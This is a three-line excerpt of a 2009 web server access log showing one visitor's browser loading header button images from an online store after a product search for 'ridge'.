71.35.187.109 - - [12/Jun/2009:01:32:21 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ridge" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN 9.0;MSN 9.1;MSN 9.6; MSNbQ002; MSNmen-us; MSNcOTH)"
71.35.187.109 - - [12/Jun/2009:01:32:21 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ridge" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN 9.0;MSN 9.1;MSN 9.6; MSNbQ002; MSNmen-us; MSNcOTH)"
71.35.187.109 - - [12/Jun/2009:01:32:21 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):ridge" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MSN 9.0;MSN 9.1;MSN 9.6; MSNbQ002; MSNmen-us; MSNcOTH)"
